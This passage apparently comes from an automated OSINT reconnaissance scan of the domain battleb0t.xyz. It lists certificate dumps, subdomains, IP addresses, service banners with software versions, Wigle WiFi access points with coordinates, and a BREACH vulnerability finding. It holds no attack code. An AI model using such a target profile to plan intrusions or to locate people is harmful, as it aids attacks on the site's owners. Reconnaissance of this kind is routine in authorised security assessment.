Version: 3 (0x2)
Serial Number:
04:a2:98:ee:7c:0f:82:53:85:c9:ed:86:47:94:a7:aa:74:64
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:54:05 2023 GMT
Not After : Apr 27 17:54:04 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d2:cd:d6:7e:84:63:03:a9:a4:54:af:d4:a6:67:
cf:f7:3e:0c:ab:80:9d:a8:22:bf:ee:64:c0:1e:dd:
e1:9d:29:3b:aa:bb:b6:1a:dd:d0:c3:5d:15:61:c8:
eb:00:a8:62:02:a5:c4:0c:4d:3a:56:20:d3:19:1c:
24:d9:21:05:da:7b:34:cd:5b:3f:9f:3f:ff:56:cb:
60:a2:2a:6a:1f:63:a5:f7:6c:bc:e6:cd:4b:7c:cb:
c6:0b:ba:27:31:61:c2:7b:47:19:7b:f1:52:41:68:
44:d8:1a:a5:11:c2:d5:cd:2d:49:92:07:b0:5c:c3:
2d:0c:54:f4:e5:8e:0a:3e:0a:05:99:5f:e9:65:18:
80:c0:5e:b2:87:08:2d:60:b2:01:35:c9:41:a1:4e:
56:80:bc:0b:2d:89:62:c9:e1:19:f4:a9:de:a5:de:
27:dd:96:99:29:26:9e:36:03:45:4b:bf:4a:de:ef:
5f:47:82:05:6f:ed:a1:4f:34:05:75:05:59:d0:32:
a2:22:c4:9d:5a:65:cd:6b:45:d7:7f:45:90:2e:36:
4c:3d:0a:62:83:36:a6:3c:d9:df:00:c7:cb:10:68:
6e:0c:d8:9c:a6:a5:e6:32:7b:12:0d:1c:1f:90:20:
a5:a7:c9:da:be:0f:96:fe:30:6b:29:55:ac:4a:68:
7b:12:dd:43:df:cf:f5:49:87:8c:9b:38:92:62:52:
c6:f8:97:d4:43:d6:ed:cb:66:79:5b:c9:60:9e:db:
33:f0:59:fb:fd:35:62:83:55:b5:65:04:20:55:ee:
82:6d:de:85:c1:18:ed:8c:10:29:47:46:ee:2a:eb:
57:cd:b1:5e:14:a7:37:00:58:3a:35:9d:fe:99:73:
d6:cd:b6:67:17:f6:27:29:ea:32:96:67:c8:fa:43:
a3:c2:cc:ca:bb:cb:87:e5:76:db:8a:de:bc:58:c7:
6c:12:6a:a6:93:1b:0a:ce:07:98:f7:7c:0d:1d:5e:
2a:ac:2b:fb:17:f1:cb:e0:a5:02:67:2b:3d:67:81:
d8:de:3e:15:6a:f0:a0:0d:64:2d:0e:9b:55:1e:1b:
69:69:5a:ae:14:c6:1c:ce:8e:c5:fd:2c:25:74:92:
c1:35:de:00:ee:bc:fa:5d:88:f2:17:fe:70:37:3b:
3b:f5:14:3a:4b:f4:50:a9:91:31:99:48:3f:9e:c6:
ad:0b:a6:89:2d:77:db:fb:64:f8:31:9a:82:d1:cd:
f7:6a:51:a4:b7:d3:da:23:3d:ff:2a:45:de:3b:b5:
32:78:69:cd:54:60:d3:2a:39:e1:61:db:5a:d2:78:
94:77:f6:b5:99:c5:b9:3c:95:4b:75:db:f8:2b:d4:
ad:de:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:62:E5:21:FA:E8:50:FB:CE:5D:D2:7E:68:EA:9B:E0:B1:2E:4D:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:54:05.304 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:2E:CD:16:75:5B:83:CE:34:DE:4E:0B:A5:
8F:CD:7C:C7:A7:A6:A9:11:C3:23:E1:0B:2A:31:9F:95:
73:C3:42:80:02:20:7B:D0:4F:D2:8B:72:CA:32:B2:4D:
CC:40:AA:8E:75:E9:77:4A:4F:D1:BA:D8:AE:0C:6B:30:
9E:04:63:28:D1:A8
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 27 18:54:05.294 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:F1:66:52:35:FF:56:8B:1D:79:47:47:
A7:1C:C3:D5:F7:A4:62:11:6E:72:13:33:6A:75:28:8C:
74:B2:4C:10:76:02:20:1B:97:A6:E2:6C:65:7B:C8:CD:
9F:BB:59:01:45:C5:3A:6B:BD:4B:C8:1B:69:3F:61:01:
38:DF:1A:9C:5B:33:60
Signature Algorithm: sha256WithRSAEncryption
ae:79:f7:6d:1b:71:32:86:32:db:2a:16:1c:43:90:9b:83:62:
0f:e8:c8:45:a2:74:39:9e:47:95:60:f9:a9:0f:5f:8f:26:9e:
6a:cb:48:fc:28:9f:be:95:de:3f:18:f2:a2:6b:df:e9:ed:0e:
0c:fe:77:c0:f9:43:13:cf:28:62:3e:eb:89:e6:eb:03:ba:b6:
65:d3:6f:26:2f:e2:cd:15:59:82:3c:0e:ae:d9:44:2e:69:94:
35:68:67:b8:2a:60:2d:04:59:19:48:8b:a7:19:32:be:3f:d4:
97:45:fa:e8:74:5a:8f:72:87:86:27:6f:fd:8c:2b:a4:50:d9:
22:2e:d0:5b:e8:25:5b:f1:50:e7:fa:72:45:0e:76:e9:66:71:
c9:e1:a7:8b:e8:5b:83:ac:a2:bc:89:be:14:a7:12:48:15:b7:
d6:1e:fe:ad:98:76:3e:16:2c:cf:38:d6:a3:13:69:b2:c3:42:
11:42:e6:c6:c6:df:61:d7:1c:e4:ca:7f:bc:9e:71:30:82:fe:
d4:6f:58:81:ab:0e:55:97:bb:c1:5d:e3:30:ef:17:60:9b:37:
2f:f7:be:34:13:0e:a6:78:95:12:19:fc:1f:5c:b8:e7:4a:08:
f6:f1:db:51:99:1c:e2:4d:5a:42:03:0e:eb:74:29:12:8b:42:
4a:ad:db:87
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:66:94:56) | 50.1188, 8.6843 |
| 2023-05-12 02:51:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:57:f8:5f:6c:a4:d7:b1:d8:61:78:13:80:db:41:a4:54:3d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:23:04 2022 GMT
Not After : Feb 15 13:23:03 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d4:b5:dd:1d:03:00:c2:48:cc:5b:27:58:5a:1a:
ae:80:1c:0d:53:93:fb:69:7f:93:43:76:4d:e8:73:
1c:07:a2:3d:20:72:26:de:8b:cf:5e:08:ec:68:b1:
f5:77:47:34:1f:fc:12:0e:2f:4f:a4:d2:06:11:00:
78:b4:0d:40:fa:ba:21:05:d4:2d:c5:6d:14:14:39:
10:9a:e0:36:33:c9:8c:bb:e8:d5:33:a2:fb:d9:f7:
b5:1a:30:55:aa:67:e3:41:20:33:a1:e6:ed:c9:c3:
5b:50:61:0a:65:ba:c7:cc:f0:84:a3:6e:26:65:39:
57:a4:99:3b:03:5d:af:09:43:83:69:7f:84:65:08:
2e:12:10:15:1c:ad:1f:68:90:6a:0e:97:7d:ef:7a:
22:74:df:40:68:54:b2:c7:43:c9:cb:1c:9c:53:1d:
c4:68:a0:95:76:a1:bf:c8:18:fb:9d:30:f5:ff:26:
f8:35:1d:65:e6:a1:bc:6a:7f:70:ab:aa:3e:d6:87:
e6:17:39:3e:1e:ae:62:43:5c:02:c9:ab:c6:49:9a:
2c:43:3e:b0:0a:bb:6b:20:c9:45:43:a6:79:f2:70:
bf:69:eb:cb:fb:70:35:1a:f8:04:00:26:77:08:9e:
32:00:34:fd:0a:63:db:bc:61:0a:d9:52:e5:61:03:
a2:9b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:5A:2D:BE:67:DF:4E:45:A4:AD:A5:64:7A:31:7E:B3:39:8F:63:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 14:23:04.766 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D4:53:59:2F:EB:FF:FB:09:BA:76:BB:
E9:A4:81:C3:B1:93:13:10:22:54:A7:54:1C:46:19:3B:
6F:1B:01:CB:65:02:21:00:BB:AD:59:07:F2:64:D8:C4:
FA:7C:E2:49:2B:E4:9B:86:A7:0D:4A:BE:2B:43:0F:BA:
C2:73:EA:C3:69:47:E2:C3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 14:23:04.781 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:97:4D:DC:2F:D1:9B:1A:BE:09:EC:A2:
59:20:1E:95:7C:4B:C9:87:AC:96:9A:C3:4F:C0:0E:23:
4F:BC:16:AA:14:02:21:00:B1:07:3B:2C:0B:51:21:34:
74:50:BD:8C:B3:BE:A9:50:07:9B:F0:85:AB:3F:69:A1:
3D:6A:46:9D:88:A6:9A:89
Signature Algorithm: sha256WithRSAEncryption
ad:f7:33:43:81:f3:8d:21:44:85:e2:84:76:49:bc:87:f0:51:
96:b7:88:05:55:85:b8:e1:90:97:3e:c1:69:16:a8:c5:f1:39:
0d:d1:5f:8d:38:e4:0d:8b:e6:47:2a:f6:40:63:03:2b:f0:1f:
be:f8:b1:82:61:91:3b:03:b0:69:20:b4:dc:30:8c:89:f3:1c:
58:10:34:d9:81:b9:21:67:93:a8:46:92:4c:c7:e9:dc:76:7f:
5b:fc:b0:d2:dc:de:8d:94:c5:6b:c4:40:90:a8:e8:74:62:d2:
e6:1b:be:60:7f:96:01:c1:48:4a:c7:bd:8c:53:d2:a6:cf:88:
fa:4c:5d:6b:ed:42:b0:75:30:19:73:a0:d5:65:1d:45:1e:70:
23:da:e7:c5:31:6f:12:d3:54:2e:a3:91:e2:56:46:67:fd:10:
01:29:6e:69:67:d8:1f:99:c8:35:4f:2e:14:20:7c:c8:7b:86:
d6:ea:ed:96:56:81:0a:9f:3d:c7:d8:52:97:ea:0d:0a:ae:e6:
ce:93:f5:1e:0e:18:81:98:ef:d7:e3:a1:ab:63:09:30:4f:8f:
f5:0c:92:d0:84:ce:09:f8:71:10:dd:91:6b:72:67:70:ee:47:
d4:69:c2:95:9e:55:af:5a:cf:d9:19:cf:5f:f9:37:c3:6b:53:
ee:53:f7:4b
| battleb0t.xyz |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | Chantilly, Virginia, 20151, United States, North America |
| 2023-05-12 02:54:22 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/html | panel.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:02:A8:96:B6:F1) | 50.1188, 8.6843 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE NAMESPACE LITERAL+ STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready.
| 87.248.157.102 |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | funny.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://funny.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'Netlify']}, u'RedirectLocation': {u'string': [u'https://funny.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'x-nf-request-id']}, u'IP': {u'string': [u'34.148.147.18']}}}, {}] |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-256-etm@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 02:45:17 | Physical Location | No | ipapi.co | 0 | 0 | 4 | 0 | None | Toronto, Ontario, ON, Canada, CA | 2606:4700:3037::6815:470e |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CableWiFi (Net ID: 00:0D:67:66:08:16) | 32.8608, -79.9746 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ISHLT-Corp (Net ID: 00:01:21:30:59:78) | 41.8781, -87.6298 |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 225.30.196.104.bc.googleusercontent.com | 104.196.30.225 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | logitec-99c005 (Net ID: 00:01:8E:99:C0:04) | 50.1188, 8.6843 |
| 2023-05-12 02:59:34 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | kekw.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ok.ru (Category: social)
https://ok.ru/login | login |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.71): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.177): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0000rgb124.github.io |
| 2023-05-12 03:25:09 | Internet Name | No | DNS Brute-forcer | 0 | 0 | 1 | 0 | None | www.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 210.30.196.104.bc.googleusercontent.com | 104.196.30.210 |
| 2023-05-12 02:53:45 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:50c0:8002::153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:EE:43:99) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:35 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Open Graph | fluid.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:02:DD:85:3E:34) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:58 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:96:9b:29:e7:ba:1f:ed:f3:53:36:ca:2c:46:93:27:46:97
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:44:09 2022 GMT
Not After : Mar 13 15:44:08 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
